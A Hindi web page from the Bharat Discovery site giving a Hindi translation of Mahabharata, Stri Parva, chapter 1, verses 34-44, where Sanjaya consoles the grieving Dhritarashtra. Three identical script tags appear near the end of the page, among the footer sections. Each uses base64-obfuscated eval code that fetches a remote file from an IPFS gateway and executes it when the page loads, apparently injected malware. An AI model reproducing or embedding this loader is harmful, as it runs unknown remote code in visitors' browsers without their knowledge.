एक्स्प्रेशन त्रुटि: अनपेक्षित उद्गार चिन्ह "०"।

महाभारत स्‍त्री पर्व अध्याय 1 श्लोक 34-44

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

प्रथम (1) अध्याय: स्‍त्री पर्व (जलप्रदानिक पर्व )

महाभारत: स्‍त्री पर्व: प्रथम अध्याय: श्लोक 34-44 का हिन्दी अनुवाद

आप भी मध्‍यस्‍थबनकर बैठे रहे, उसे कोई उचित सलाह नहीं दी । आप दुर्धर्ष वीर थे–आपकी बात कोई टाल नहीं सकताथा,तो भी आपने दोनों ओर के बोशे को समाभाव से तराजू पर नहीं तौला । ‘मनुष्‍यको पहले ही यथायोग्‍य बर्ताव करना चाहिये, जिससे आगे चलकर उसे बीती हुई बात के ‍लिये पश्चाताप न करना पड़े । ‘राजन् ! आपने पुत्र के प्रति आसक्ति रखनेके कारण सदा उसी का प्रिय करना चाहा, इसीलिये इस समय आपको यह पश्चाताप का अवसर प्राप्‍त हुआ है; अत: अब आप शोक न करें । ‘जो केवल ऊँचे स्‍थान पर लगे हुए मधु को देखकरवहाँ से गिरने की सम्‍भावना की ओर से आँख बंद कर लेता है, वह उस मधु के लालच से नीचे गिरकर इसी तरह शोक करता है, जैसे आप कर रहे हैं । ‘शोक करने वाला मनुष्‍य अपने अभीष्‍ट पदार्थोंको नहीं पाता है, शोकपरायण पुरुष किसी फल को नहीं हस्‍तगत कर पाता है । शोक करने वाले को न तो लक्ष्‍मी की प्राप्ति होती है और न उसे परमात्‍मा ही मिलता है । ‘जो मनुष्‍य स्‍वयं आग जलाकर उसे कपड़े में लपेट लेता है और जलने पर मन–ही–मन संताप का अनुभव करता है, वह बुद्धिमान् नहीं कहा जा सकता है । ‘पुत्रसहित आपने ही अपने लोभरूपी घी से सींचकर और वचनरूपी वायु से प्रेरित करके पार्थरूपी अग्नि को प्रज्‍जलित किया था । ‘उसी प्रज्‍जलित अग्नि में आपके सारे पुत्र पतंगों के समान पड़ गये हैं । बाणों की आग में जलकर भस्‍म हुए उन पुत्रों के लिये आपको शोक नहीं करना चाहिये । ‘नरेश्वर ! आप को आँसुओं की धारा से भीगा हुआ मुँह लिये फिरते हैं, यह अशास्त्रीय कार्य है । विद्वान् पुरुष इसकी प्रशंसा नहीं करते हैं । ‘ये शोक के आँसू आग की चिनगारियों के समान इन मनुष्‍यों को नि:संदेह जलाया करते हैं; अत: आप शोक छोड़िये और बुद्धि के द्वारा अपने मन को स्‍वयं ही सुस्थिर कीजिये’। वैशम्‍पायनजी कहते हैं–शत्रुओं को संताप देने वाले जनमेजय ! महात्‍मा संजयने जब इस प्रकार राजा धृतराष्‍ट्र को आश्वासन दिया, तब विदुरजी ने भी पुन: सन्‍त्‍वना देते हुए उनसे यह विचारपूर्ण वचन कहा ।

इस प्रकार श्रीमहाभारत स्त्रीपर्व के अन्‍तर्गत जलप्रदानिकपर्व में धृतराष्‍ट्र के शोक का निवारण विषयक पहला अध्‍याय पूरा हुआ।


« पीछे आगे »

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>